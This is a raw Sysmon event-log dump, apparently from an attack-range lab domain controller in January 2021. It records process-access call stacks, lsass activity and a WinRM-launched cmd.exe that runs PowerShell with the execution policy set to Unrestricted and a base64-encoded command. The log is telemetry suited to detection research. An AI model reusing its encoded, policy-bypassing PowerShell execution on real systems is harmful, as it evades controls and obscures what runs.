EgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425D-6000-7315-110000000000}0x1115730HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-425D-6000-D302-000000009901}4288C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-425D-6000-D202-000000009901}45722460C:\Windows\system32\conhost.exe{08A6967A-425D-6000-D302-000000009901}4288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-425D-6000-D302-000000009901}4288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-425D-6000-D102-000000009901}25645104C:\Windows\system32\WinrsHost.exe{08A6967A-425D-6000-D302-000000009901}4288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.443{08A6967A-425D-6000-D302-000000009901}4288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425D-6000-7315-110000000000}0x1115730HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-425D-6000-D102-000000009901}2564C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.434{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 